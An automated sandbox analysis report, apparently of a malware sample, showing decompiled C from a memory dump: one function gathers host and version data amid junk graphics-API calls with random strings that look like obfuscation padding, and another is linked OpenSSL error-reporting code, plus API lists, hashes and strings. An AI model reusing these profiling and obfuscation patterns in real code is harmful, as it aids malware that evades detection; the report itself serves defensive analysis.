String ID:
API String ID: 1518329722-0
Opcode ID: 557b108f189787312821d3b6e155c74be501d70e020fa1a69b531eb6c74deeea
Instruction ID: 3bd81139a7291b65baabf5706927ffeb0f28e2dfa39c25aefa7577825b0b65b0
Opcode Fuzzy Hash: 557b108f189787312821d3b6e155c74be501d70e020fa1a69b531eb6c74deeea
Instruction Fuzzy Hash: D4E086B6900308BFC7149F64CD06F5AB6ECEB44704F054919BD43B7340E671EE008760

Uniqueness

Uniqueness Score: -1.00%

Function 00EC897B, Relevance: 32.0, APIs: 15, Strings: 3, Instructions: 473
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EC897B(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v316;
				char _v340;
				void* __edi;
				void* __esi;
				intOrPtr* _t138;
				intOrPtr _t140;
				intOrPtr _t144;
				intOrPtr _t148;
				intOrPtr _t150;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr _t161;
				intOrPtr _t164;
				intOrPtr _t166;
				char _t173;
				intOrPtr _t174;
				char _t175;
				intOrPtr _t176;
				intOrPtr _t178;
				char _t180;
				char _t182;
				char _t184;
				char _t185;
				char _t187;
				char _t189;
				char _t190;
				char _t191;
				char _t192;
				char _t193;
				intOrPtr _t196;
				intOrPtr _t235;
				char _t246;
				intOrPtr _t247;
				intOrPtr* _t279;
				void* _t288;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				intOrPtr _t296;
				void* _t297;
				void* _t298;
				void* _t299;
				void* _t300;
				void* _t326;
				void* _t327;
				void* _t346;
				intOrPtr* _t349;
				struct HDC__* _t353;
				void* _t355;
				intOrPtr* _t356;
				intOrPtr* _t357;

				_t138 = E00ECD239(0xcc);
				_t279 = _t138;
				if(_t279 != 0) {
					 *_t279 = E00ED1A5D(__edx, 0xb);
					_t140 =  *0xef56a8; // 0xf00000
					_push( *(_t140 + 0x98) & 0x0000ffff);
					_push( *(_t140 + 0x96) & 0x0000ffff);
					_push( *(_t140 + 0x94) & 0x0000ffff);
					_push( *((intOrPtr*)(_t140 + 0xc)));
					_push( *(_t140 + 0x9a) & 0x000000ff);
					_push( *((intOrPtr*)(_t140 + 8)));
					_t7 = _t279 + 4; // 0x4
					_push( *((intOrPtr*)(_t140 + 4)));
					_push("%u.%u.%u.%u.%u.%u.%04x");
					_t346 = 0x3f;
					E00ECE20F(_t346, _t7);
					_t356 = _t355 + 0x20;
					BitBlt(0, 7, 0x24, 0x4b, 0x5e, 0, 0x1b, 0x19, 0x44);
					 *((intOrPtr*)(_t279 + 0x44)) = E00ED6F70( *(_t140 + 0x9a) & 0x000000ff);
					_t144 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x48)) = E00ECEC9D(_t144 + 0x199c);
					IsValidCodePage(0x2a);
					_t148 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x4c)) = E00ECEC9D( *((intOrPtr*)(_t148 + 0x218)));
					_t150 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x50)) =  *((intOrPtr*)(_t150 + 0x220));
					BitBlt(0, 0x61, 0x27, 0x2b, 0x36, 0, 0x40, 0x3b, 0x25);
					_t153 =  *0xef56a8; // 0xf00000
					if( *((intOrPtr*)(_t153 + 0x21c)) != 0) {
						 *((intOrPtr*)(_t279 + 0x54)) = E00ECEC9D( *((intOrPtr*)(_t153 + 0x21c)));
					}
					_t154 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x90)) =  *((intOrPtr*)(_t154 + 0x1850));
					_t156 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x58)) = E00ECEC9D(_t156 + 0x114);
					_t159 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x5c)) =  *((intOrPtr*)(_t159 + 0x214));
					_t161 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x60)) = ( *(_t161 + 0x9c) & 0x0000ffff) + 1;
					_t164 =  *0xef56a8; // 0xf00000
					 *((intOrPtr*)(_t279 + 0x64)) =  *((intOrPtr*)(_t164 + 0x101c));
					_t166 =  *0xef56a8; // 0xf00000
					_pop(_t288);
					 *((intOrPtr*)(_t279 + 0x68)) =  *((intOrPtr*)(_t166 + 0x1898));
					 *((intOrPtr*)(_t279 + 0x6c)) = E00ED6557(_t288);
					IsValidCodePage(0x26);
					 *((intOrPtr*)(_t279 + 0x70)) = E00ED64A4(_t288);
					 *((intOrPtr*)(_t279 + 0x74)) = GetSystemMetrics(0);
					 *((intOrPtr*)(_t279 + 0x78)) = GetSystemMetrics(1);
					_t173 = E00ECD239(8);
					_pop(_t289);
					_v8 = _t173;
					if(_t173 != 0) {
						_t174 = E00ECD239(0x2000);
						_t289 = _v8;
						 *((intOrPtr*)(_v8 + 4)) = _t174;
						if(_t174 == 0) {
							goto L4;
						}
						E00ECDBD6(E00EC8888, _t289);
						_t175 = _v8;
						_pop(_t289);
						goto L7;
					} else {
						L4:
						_t175 = 0;
						L7:
						 *((intOrPtr*)(_t279 + 0x7c)) = _t175;
						_t176 =  *0xef56a8; // 0xf00000
						 *((intOrPtr*)(_t279 + 0x88)) = _t176 + 0x228;
						_t178 =  *0xef56a8; // 0xf00000
						 *((intOrPtr*)(_t279 + 0x8c)) = _t178 + 0x1644;
						_t180 = E00EC27B8(_t289, 0x313);
						_pop(_t291);
						_v8 = _t180;
						_v48 = E00EC27B8(_t291, 0xc9);
						 *_t356 = 0x14d;
						_t182 = E00EC27B8(_t291);
						_pop(_t292);
						_v44 = _t182;
						BitBlt(0, 0x63, 0x2b, 0x2b, 5, 0, 0x1e, 4, 0x4e);
						_t184 = E00EC27B8(_t292, 0x457);
						_pop(_t293);
						_v24 = _t184;
						_t185 = E00EC27B8(_t293, 0x4d);
						_pop(_t294);
						_v28 = _t185;
						CreateEnhMetaFileA(0, "EYSR.qELdJGwq6RGO.6aDXJ5Clj LFinFoN UpSFgU4", 0, 0);
						_t187 = E00EC27B8(_t294, 0x39a);
						_t296 =  *0xef56a8; // 0xf00000
						_v52 = _t187;
						E00ECE17D(0x80,  &_v316, _t187,  *((intOrPtr*)(_t296 + 0x218)));
						_t189 = E00EC27B8(_t296, 0xf2);
						_t357 = _t356 + 0xc;
						_v20 = _t189;
						_t190 = E00EC27B8(_t296, 0x411);
						_pop(_t297);
						_v12 = _t190;
						_t191 = E00EC27B8(_t297, 0xb0);
						_pop(_t298);
						_v16 = _t191;
						_t192 = E00EC27B8(_t298, 0x5b);
						_pop(_t299);
						_v32 = _t192;
						_t193 = E00EC27B8(_t299, 0xd4);
						_pop(_t300);
						_v40 = _t193;
						_v36 = E00EC27B8(_t300, 0x11);
						 *((intOrPtr*)(_t279 + 0x9c)) = E00ECDE59(_v8);
						_t196 = E00ECDE59(_v48);
						_t353 = 0;
						 *((intOrPtr*)(_t279 + 0xa0)) = _t196;
						ArcTo(0, 0x3d, 0x2e, 0x5c, 0x3a, 0x4f, 0x32, 0xb, 4);
						 *((intOrPtr*)(_t279 + 0xa4)) = E00ECDE59(_v44);
						 *((intOrPtr*)(_t279 + 0xa8)) = E00ECDE59(_v24);
						 *((intOrPtr*)(_t279 + 0xac)) = E00ECDE59(_v28);
						BitBlt(0, 0xb, 0x3d, 0x5f, 0x23, 0, 0x1a, 0x11, 0x58);
						 *((intOrPtr*)(_t279 + 0xb0)) = E00ECDE59( &_v316);
						 *((intOrPtr*)(_t279 + 0xb4)) = E00ECDE59(_v20);
						 *((intOrPtr*)(_t279 + 0xb8)) = E00ECDE59(_v12);
						 *((intOrPtr*)(_t279 + 0xbc)) = E00ECDE59(_v16);
						 *((intOrPtr*)(_t279 + 0xc0)) = E00ECDE59(_v32);
						 *((intOrPtr*)(_t279 + 0xc4)) = E00ECDE59(_v40);
						 *((intOrPtr*)(_t279 + 0xc8)) = E00ECDE59(_v36);
						IsValidCodePage(0x23);
						E00ED0299( &_v8);
						E00ED0299( &_v48);
						E00ED0299( &_v44);
						E00ED0299( &_v24);
						E00ED0299( &_v28);
						E00ED0299( &_v52);
						E00ED0299( &_v20);
						E00ED0299( &_v12);
						E00ED0299( &_v16);
						E00ED0299( &_v32);
						E00ED0299( &_v40);
						E00ED0299( &_v36);
						 *((intOrPtr*)(_t279 + 0x94)) = 6;
						_t235 = E00ECD239(0x18);
						_pop(_t326);
						 *((intOrPtr*)(_t279 + 0x98)) = _t235;
						if(_t235 != 0) {
							_v8 = E00ED3A82(_t326, 0x3fe);
							 *_t357 = 0x48c;
							_v36 = E00ED3A82(_t326);
							 *_t357 = 0x1b7;
							_v40 = E00ED3A82(_t326);
							 *_t357 = 0xd89;
							_v32 = E00ED3A82(_t326);
							 *_t357 = 0xbd4;
							_v16 = E00ED3A82(_t326);
							 *_t357 = 0xb9c;
							_v12 = E00ED3A82(_t326);
							 *_t357 = 0x6d2;
							_v20 = E00ED3A82(_t326);
							 *_t357 = 0xc7b;
							_v28 = E00ED3A82(_t326);
							 *_t357 = 0x126;
							_t246 = E00ED3A82(_t326);
							_pop(_t327);
							_t354 = "*";
							_v24 = _t246;
							_t247 = E00ED68F2(_t327, _v8, _v36, "*");
							_t349 = __imp__GetCPInfoExA;
							 *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x98)))) = _t247;
							 *_t349(0xb, 0x1d,  &_v340);
							 *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x98)) + 4)) = E00ED68F2( *((intOrPtr*)(_t279 + 0x98)), _v8, _v40, "*");
							 *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x98)) + 8)) = E00ED68F2( *((intOrPtr*)(_t279 + 0x98)), _v8, _v32, "*");
							 *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x98)) + 0xc)) = E00ED68F2( *((intOrPtr*)(_t279 + 0x98)), _v8, _v16, _t354);
							 *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x98)) + 0x10)) = E00ED68F2( *((intOrPtr*)(_t279 + 0x98)), _v8, _v12, _v28);
							 *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x98)) + 0x14)) = E00ED68F2( *((intOrPtr*)(_t279 + 0x98)), _v8, _v20, _v24);
							E00ED0299( &_v8);
							E00ED0299( &_v36);
							E00ED0299( &_v40);
							 *_t349(0x1f, 0x25,  &_v340);
							E00ED0299( &_v32);
							E00ED0299( &_v16);
							E00ED0299( &_v12);
							E00ED0299( &_v20);
							E00ED0299( &_v28);
							E00ED0299( &_v24);
							 *_t349(0x59, 0x12,  &_v340);
							_t353 = 0;
						}
						CreateEnhMetaFileA(_t353, "OQnEgmEJCjbc PwBYYjN.w SElaQpvAXAswgAgHT4T,,z mWF 5dRN0PEf2QwmvXnLL D7V5X66gcb,Tn9 s0Nq fUj7JGVnF V p8Vuw1KjtVlIyGFSsGKn2rGKvk7oX5pb6ZJz JMV2isjxfIydq GpBj0NhpjXTGbfpYanMncEzSqdu7GMlhv7mFRzGqI2fQ1eGn6ZVKpnR Fcnfa3X3 Tu0sYyH eiMTFZdO LXpcBQir4Uz0ujrqu9,ZUUPBgR00Yp4tAYOwKf,a,1WS1TfBhvifvesdtFHRi4xWSUJuTpoCXzDPtINj0hfkDC,d1DnoXYdjZPqWjiyRbMg5eKdgthmm1WjyT4ubWxhWNdoSuZk5 uX 2jT0eYtpO qx4QUY0ec9tfWPPfzwTlQ3JT2nGjAflDDBlPCiwmoTGKUc1PEEeUSYC TPODb7ypFMkEKj,Bs8R1isRNlbUbLpim HjFNIxGshXmKkF7.l7ZD9xmwDN,2JBoJwQjLepOPoieS0CfXjfA.2Wvd BDs9Pm1Rd63uBdbQvM.pA1Ov6 sBGJW58FSR6lYF GshcQa5z3f PyLloS998qx UWNCg4KPY0RZR YyW9Od.eZhMlRPrtvDJdGrDBRiAiBZBidvda1UvSfA1kdICAjo,yik  Tdr  pYgnZ9V67Ai3lUGaJw0X4ayNAIbSbJBeQq.uR3YhQqiJsdnc1Huc,9PdJQNtrIsuGT q1Z YjVWtqPaAV Qk82b08TMrXmPqPx73PvMx4e1UmC8baJ8z0Alhhnr i17X7PajWvQxcSdCSDTXu,07.TVm zSztuC8 NkRUVnTUKZ.3Fh vDEI3Up.t.23OEkmWmeZuwFKe1q5JF1vfa6NWQ3YcHak a9LrVnTxBEvbTYxkj3SLya01aYw21voivBZbJoaIg3ONrS9.7BArnEM,KP 3xLcCSvZne0N6sfAaniOalQh2u07ixgedNNpowA151 oHIdTzjCBZTwQdzH1ezwwfaBAJf3Iz4HGKRhU43,opbK dJHAFYs9LOQPR PVfwk.IxgF.Uslb1GFO2uLnD2QjYS1mYNNr,ZkKIrb  eAjwrbjiHgyOYX2ZQRtZwD.abOhEO9y.OOJPKYJ9nApbLf87MWdjLl5nQa . BzMikDfd3R1.xhO8syHpK cULYaw81e6ea5YEWLOvdmqE,.IWYIPtBdXEMsTmYET.n1w8X4CK 5qz76q7dM 4VXI0JoiIjvYcUe7JPkbEVNFfBmv FxVNOnnAJJcaD7v514WKNM2ZTIrni1BwUq MUPXYLsz zTBU7CIN424Qbi9m1l8Ag92w 2kDfFHlMhz0TKl2KdlbANZaPv9l0k52rCsd SDX7bd,M6Ko.dEpQR XbHLxyrZ94p7CMQ0dZn luHati9hvOpHXMe7ha .IOr p,Dev", _t353, _t353);
						return _t279;
					}
				}
				return _t138;
			}

0x00ec898c
0x00ec8991
0x00ec8996
0x00ec89a4
0x00ec89a6
0x00ec89b2
0x00ec89ba
0x00ec89c2
0x00ec89c3
0x00ec89cd
0x00ec89ce
0x00ec89d1
0x00ec89d4
0x00ec89d7
0x00ec89de
0x00ec89df
0x00ec89ea
0x00ec89ff
0x00ec8a06
0x00ec8a09
0x00ec8a1c
0x00ec8a1f
0x00ec8a25
0x00ec8a41
0x00ec8a44
0x00ec8a54
0x00ec8a57
0x00ec8a59
0x00ec8a64
0x00ec8a72
0x00ec8a72
0x00ec8a75
0x00ec8a80
0x00ec8a86
0x00ec8a96
0x00ec8a99
0x00ec8aa4
0x00ec8aa7
0x00ec8ab4
0x00ec8ab7
0x00ec8ac2
0x00ec8ac5
0x00ec8ad0
0x00ec8ad1
0x00ec8adb
0x00ec8ade
0x00ec8aea
0x00ec8af5
0x00ec8b00
0x00ec8b03
0x00ec8b08
0x00ec8b09
0x00ec8b0e
0x00ec8b19
0x00ec8b1f
0x00ec8b22
0x00ec8b27
0x00000000
0x00000000
0x00ec8b2f
0x00ec8b34
0x00ec8b38
0x00000000
0x00ec8b10
0x00ec8b10
0x00ec8b10
0x00ec8b39
0x00ec8b39
0x00ec8b3c
0x00ec8b46
0x00ec8b4c
0x00ec8b5b
0x00ec8b61
0x00ec8b66
0x00ec8b6c
0x00ec8b74
0x00ec8b77
0x00ec8b7e
0x00ec8b83
0x00ec8b94
0x00ec8b97
0x00ec8b9e
0x00ec8ba3
0x00ec8ba6
0x00ec8ba9
0x00ec8bae
0x00ec8bb7
0x00ec8bba
0x00ec8bc5
0x00ec8bcb
0x00ec8be3
0x00ec8be6
0x00ec8bf0
0x00ec8bf5
0x00ec8bfd
0x00ec8c00
0x00ec8c05
0x00ec8c0b
0x00ec8c0e
0x00ec8c13
0x00ec8c16
0x00ec8c19
0x00ec8c1e
0x00ec8c24
0x00ec8c27
0x00ec8c2c
0x00ec8c2f
0x00ec8c3b
0x00ec8c47
0x00ec8c4d
0x00ec8c63
0x00ec8c66
0x00ec8c6c
0x00ec8c7e
0x00ec8c8d
0x00ec8ca9
0x00ec8caf
0x00ec8cc5
0x00ec8cd4
0x00ec8ce3
0x00ec8cf2
0x00ec8d01
0x00ec8d10
0x00ec8d1e
0x00ec8d24
0x00ec8d2e
0x00ec8d38
0x00ec8d42
0x00ec8d4c
0x00ec8d56
0x00ec8d60
0x00ec8d6a
0x00ec8d74
0x00ec8d7e
0x00ec8d88
0x00ec8d92
0x00ec8d9c
0x00ec8da4
0x00ec8dae
0x00ec8db3
0x00ec8db4
0x00ec8dbc
0x00ec8dcc
0x00ec8dcf
0x00ec8ddb
0x00ec8dde
0x00ec8dea
0x00ec8ded
0x00ec8df9
0x00ec8dfc
0x00ec8e08
0x00ec8e0b
0x00ec8e17
0x00ec8e1a
0x00ec8e26
0x00ec8e29
0x00ec8e35
0x00ec8e38
0x00ec8e3f
0x00ec8e44
0x00ec8e45
0x00ec8e4e
0x00ec8e54
0x00ec8e5f
0x00ec8e68
0x00ec8e75
0x00ec8e90
0x00ec8ea8
0x00ec8ebf
0x00ec8ed9
0x00ec8eed
0x00ec8ef7
0x00ec8f01
0x00ec8f0b
0x00ec8f1c
0x00ec8f22
0x00ec8f2c
0x00ec8f36
0x00ec8f40
0x00ec8f4a
0x00ec8f54
0x00ec8f65
0x00ec8f67
0x00ec8f67
0x00ec8f71
0x00000000
0x00ec8f77
0x00ec8b0e
0x00ec8f7d

APIs

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

Part of subcall function 00ECE20F: _vsnprintf.MSVCRT ref: 00ECE224

BitBlt.GDI32(00000000,00000007,00000024,0000004B,0000005E,00000000,0000001B,00000019,00000044), ref: 00EC89FF
IsValidCodePage.KERNEL32(0000002A,?,?,?,?,?,00000000,?,00000000), ref: 00EC8A1F
BitBlt.GDI32(00000000,00000061,00000027,0000002B,00000036,00000000,00000040,0000003B,00000025), ref: 00EC8A57
IsValidCodePage.KERNEL32(00000026,?,?,?,?,?,00000000,?,00000000), ref: 00EC8ADE
GetSystemMetrics.USER32 ref: 00EC8AED
GetSystemMetrics.USER32 ref: 00EC8AF8
BitBlt.GDI32(00000000,00000063,0000002B,0000002B,00000005,00000000,0000001E,00000004,0000004E), ref: 00EC8B97
CreateEnhMetaFileA.GDI32(00000000,EYSR.qELdJGwq6RGO.6aDXJ5Clj LFinFoN UpSFgU4,00000000,00000000), ref: 00EC8BBA
ArcTo.GDI32(00000000,0000003D,0000002E,0000005C,0000003A,0000004F,00000032,0000000B,00000004), ref: 00EC8C6C
BitBlt.GDI32(00000000,0000000B,0000003D,0000005F,00000023,00000000,0000001A,00000011,00000058), ref: 00EC8CAF
IsValidCodePage.KERNEL32(00000023,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00EC8D24
GetCPInfoExA.KERNEL32(0000000B,0000001D,?), ref: 00EC8E75

Part of subcall function 00ED68F2: SysAllocString.OLEAUT32(?), ref: 00ED6995
Part of subcall function 00ED68F2: SysAllocString.OLEAUT32(00000000), ref: 00ED69A9
Part of subcall function 00ED68F2: SysFreeString.OLEAUT32(?), ref: 00ED6D48
Part of subcall function 00ED68F2: SysFreeString.OLEAUT32(?), ref: 00ED6D4D

Part of subcall function 00ED68F2: SafeArrayDestroy.OLEAUT32(?), ref: 00ED6CF5

Part of subcall function 00ED68F2: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00ED6A42
Part of subcall function 00ED68F2: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00ED6A51
Part of subcall function 00ED68F2: SafeArrayDestroy.OLEAUT32(?), ref: 00ED6CB9

Part of subcall function 00ED68F2: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 00ED6AC3
Part of subcall function 00ED68F2: VariantClear.OLEAUT32(?), ref: 00ED6C98
Part of subcall function 00ED68F2: SysFreeString.OLEAUT32(?), ref: 00ED6CA1

GetCPInfoExA.KERNEL32(0000001F,00000025,?), ref: 00EC8F1C
GetCPInfoExA.KERNEL32(00000059,00000012,?), ref: 00EC8F65
CreateEnhMetaFileA.GDI32(00000000,OQnEgmEJCjbc PwBYYjN.w SElaQpvAXAswgAgHT4T,,z mWF 5dRN0PEf2QwmvXnLL D7V5X66gcb,Tn9 s0Nq fUj7JGVnF V p8Vuw1KjtVlIyGFSsGKn2rGKvk7oX5pb6ZJz JMV2isjxfIydq GpBj0NhpjXTGbfpYanMncEzSqdu7GMlhv7mFRzGqI2fQ1eGn6ZVKpnR Fcnfa3X3 Tu0sYyH eiMTFZdO LXpcBQir4Uz0ujrqu9,ZUUPBgR0,00000000,00000000), ref: 00EC8F71

Strings

OQnEgmEJCjbc PwBYYjN.w SElaQpvAXAswgAgHT4T,,z mWF 5dRN0PEf2QwmvXnLL D7V5X66gcb,Tn9 s0Nq fUj7JGVnF V p8Vuw1KjtVlIyGFSsGKn2rGKvk7oX5pb6ZJz JMV2isjxfIydq GpBj0NhpjXTGbfpYanMncEzSqdu7GMlhv7mFRzGqI2fQ1eGn6ZVKpnR Fcnfa3X3 Tu0sYyH eiMTFZdO LXpcBQir4Uz0ujrqu9,ZUUPBgR0, xrefs: 00EC8F6B
EYSR.qELdJGwq6RGO.6aDXJ5Clj LFinFoN UpSFgU4, xrefs: 00EC8BB1
%u.%u.%u.%u.%u.%u.%04x, xrefs: 00EC89D7

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ArraySafeString$CodeFreeInfoPageValid$AllocBoundCreateDestroyFileMetaMetricsSystem$AllocateClearElementHeapVariant_vsnprintf
String ID: %u.%u.%u.%u.%u.%u.%04x$EYSR.qELdJGwq6RGO.6aDXJ5Clj LFinFoN UpSFgU4$OQnEgmEJCjbc PwBYYjN.w SElaQpvAXAswgAgHT4T,,z mWF 5dRN0PEf2QwmvXnLL D7V5X66gcb,Tn9 s0Nq fUj7JGVnF V p8Vuw1KjtVlIyGFSsGKn2rGKvk7oX5pb6ZJz JMV2isjxfIydq GpBj0NhpjXTGbfpYanMncEzSqdu7GMlhv7mFRzGqI2fQ1eGn6ZVKpnR Fcnfa3X3 Tu0sYyH eiMTFZdO LXpcBQir4Uz0ujrqu9,ZUUPBgR0
API String ID: 589124416-650432698
Opcode ID: 62c553827b18be41fd2d8f5920403d1c2c750a0174e8a79983a14d03e31d9134
Instruction ID: 9bc0d879ad3234be758d839364517f363f98cc6f3dac3e285ccd745333c288d3
Opcode Fuzzy Hash: 62c553827b18be41fd2d8f5920403d1c2c750a0174e8a79983a14d03e31d9134
Instruction Fuzzy Hash: 740230B1941308AEDB04AFA4ED8AFED7BE4EF04710F14146AF604BF292EBB59545CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1C7A, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 214
registryfilewindowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00ED1C7A(char* _a4, char _a8) {
				void* _v8;
				CHAR* _v12;
				char _v13;
				void _v268;
				signed int _v272;
				int _v276;
				long _v280;
				void* _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				void* _v300;
				CHAR* _v304;
				long _v308;
				intOrPtr* _v312;
				intOrPtr _v316;
				char _v317;
				intOrPtr _v324;
				signed int _v328;
				int _t152;
				signed short _t162;
				signed short _t163;
				signed short _t164;
				signed short _t165;
				int _t182;

				_v8 = GetStdHandle(0xfffffff4);
				if(_v8 == 0 || GetFileType(_v8) == 0) {
					if(1 == 0) {
						do {
							_v312 = _a4;
							_v316 = _v312 + 1;
							do {
								_v317 =  *_v312;
								_v312 = _v312 + 1;
							} while (_v317 != 0);
							_v324 = _v312 - _v316;
							_v292 = _v324 + 1;
							_v284 = malloc(_v292 << 1);
							if(_v284 != 0) {
								if(MultiByteToWideChar(0, 0, _a4, _v292, _v284, _v292) != 0) {
									L17:
									_v288 = _v288 & 0x00000000;
									while(_v288 < _v292) {
										if(( *(_v284 + _v288 * 2) & 0x0000ffff) != 0x25) {
											L39:
											_v288 = _v288 + 1;
											continue;
										} else {
											goto L21;
										}
										do {
											L21:
											_v296 = _v296 & 0x00000000;
											_v328 =  *(_v284 + 2 + _v288 * 2) & 0x0000ffff;
											if(_v328 > 0x43) {
												if(_v328 == 0x53) {
													_t162 = 0x73;
													 *(_v284 + 2 + _v288 * 2) = _t162;
												} else {
													if(_v328 == 0x63) {
														_t163 = 0x43;
														 *(_v284 + 2 + _v288 * 2) = _t163;
													} else {
														if(_v328 == 0x73) {
															_t164 = 0x53;
															 *(_v284 + 2 + _v288 * 2) = _t164;
														}
													}
												}
												goto L38;
											}
											if(_v328 == 0x43) {
												_t165 = 0x63;
												 *(_v284 + 2 + _v288 * 2) = _t165;
												goto L38;
											}
											if(_v328 == 0x2a) {
												L33:
												_v288 = _v288 + 1;
												_v296 = 1;
												goto L38;
											}
											if(_v328 <= 0x2c) {
												goto L38;
											}
											if(_v328 <= 0x2e) {
												goto L33;
											}
											if(_v328 <= 0x2f) {
												goto L38;
											}
											if(_v328 <= 0x39) {
												goto L33;
											}
											L38:
										} while (_v296 != 0);
										goto L39;
									}
									goto L40;
								}
								_v288 = _v288 & 0x00000000;
								while(_v288 < _v292) {
									 *(_v284 + _v288 * 2) = _a4[_v288];
									_v288 = _v288 + 1;
								}
								goto L17;
							}
							_v12 = L"no stack?";
							break;
							L40:
							_v12 = _v284;
						} while (0 != 0);
						L41:
						_v272 =  &_a8;
						_vsnprintf( &_v268, 0xff, _v12, _v272);
						_v13 = 0;
						_v272 = _v272 & 0x00000000;
						if(GetVersion() >= 0x80000000 || E00ED1B51() <= 0) {
							return MessageBoxA(0,  &_v268, "OpenSSL: FATAL", 0x10);
						} else {
							_t152 = RegisterEventSourceA(0, "OpenSSL");
							_v300 = _t152;
							if(_v300 != 0) {
								_v304 =  &_v268;
								ReportEventA(_v300, 1, 0, 0, 0, 1, 0,  &_v304, 0);
								_t152 = DeregisterEventSource(_v300);
							}
							return _t152;
						}
					}
					_v12 = _a4;
					goto L41;
				} else {
					_v272 =  &_a8;
					_v276 = _vsnprintf( &_v268, 0x100, _a4, _v272);
					if(_v276 >= 0) {
						_v308 = _v276;
					} else {
						_v308 = 0x100;
					}
					_t182 = WriteFile(_v8,  &_v268, _v308,  &_v280, 0);
					_v272 = _v272 & 0x00000000;
					return _t182;
				}
			}

0x00ed1c8b
0x00ed1c92
0x00ed1d21
0x00ed1d2e
0x00ed1d31
0x00ed1d3e
0x00ed1d44
0x00ed1d4c
0x00ed1d52
0x00ed1d58
0x00ed1d6d
0x00ed1d7a
0x00ed1d90
0x00ed1d9d
0x00ed1dcc
0x00ed1e11
0x00ed1e11
0x00ed1e27
0x00ed1e4c
0x00ed1f59
0x00ed1e21
0x00000000
0x00000000
0x00000000
0x00000000
0x00ed1e52
0x00ed1e52
0x00ed1e52
0x00ed1e6a
0x00ed1e77
0x00ed1ec7
0x00ed1f0e
0x00ed1f1b
0x00ed1ec9
0x00ed1ed0
0x00ed1f24
0x00ed1f31
0x00ed1ed2
0x00ed1ed9
0x00ed1ef8
0x00ed1f05
0x00ed1f05
0x00ed1ed9
0x00ed1ed0
0x00000000
0x00ed1ec7
0x00ed1e80
0x00ed1f3a
0x00ed1f47
0x00000000
0x00ed1f47
0x00ed1e8d
0x00ed1edd
0x00ed1ee4
0x00ed1eea
0x00000000
0x00ed1eea
0x00ed1e96
0x00000000
0x00000000
0x00ed1ea3
0x00000000
0x00000000
0x00ed1eac
0x00000000
0x00000000
0x00ed1eb9
0x00000000
0x00000000
0x00ed1f4c
0x00ed1f4c
0x00000000
0x00ed1e52
0x00000000
0x00ed1e27
0x00ed1dce
0x00ed1de4
0x00ed1e0b
0x00ed1dde
0x00ed1dde
0x00000000
0x00ed1de4
0x00ed1d9f
0x00000000
0x00ed1f5e
0x00ed1f64
0x00ed1f67
0x00ed1f6f
0x00ed1f72
0x00ed1f8d
0x00ed1f96
0x00ed1f9a
0x00ed1fac
0x00000000
0x00ed1fb7
0x00ed1fbe
0x00ed1fc4
0x00ed1fd1
0x00ed1fd9
0x00ed1ffa
0x00ed2006
0x00ed2006
0x00000000
0x00ed1fd1
0x00ed1fac
0x00ed1d26
0x00000000
0x00ed1ca5
0x00ed1ca8
0x00ed1ccc
0x00ed1cd9
0x00ed1ced
0x00ed1cdb
0x00ed1cdb
0x00ed1cdb
0x00ed1d0c
0x00ed1d12
0x00000000
0x00ed1d12

APIs

GetStdHandle.KERNEL32(000000F4), ref: 00ED1C85
GetFileType.KERNEL32(00000000), ref: 00ED1C9B
_vsnprintf.MSVCRT ref: 00ED1CC3
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00ED1D0C
malloc.MSVCRT ref: 00ED1D89
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00ED1DC4
_vsnprintf.MSVCRT ref: 00ED1F8D
GetVersion.KERNEL32 ref: 00ED1FA1
RegisterEventSourceA.ADVAPI32(00000000,OpenSSL), ref: 00ED1FBE
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00ED1FFA
DeregisterEventSource.ADVAPI32(00000000), ref: 00ED2006
MessageBoxA.USER32 ref: 00ED201E

Strings

s, xrefs: 00ED1ED2
no stack?, xrefs: 00ED1D9F
OpenSSL, xrefs: 00ED1FB7
OpenSSL: FATAL, xrefs: 00ED2010

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Event$FileSource_vsnprintf$ByteCharDeregisterHandleMessageMultiRegisterReportTypeVersionWideWritemalloc
String ID: OpenSSL$OpenSSL: FATAL$no stack?$s
API String ID: 4234056380-2900841107
Opcode ID: 16cc313f8e8dd8e01c834c7027579ed332eabe3692db8f012cd00867c2809fb7
Instruction ID: 55614b83384861808e3a1537aa3a285ca4bd3f36aaf89f32a0c83c2fb2f8c957
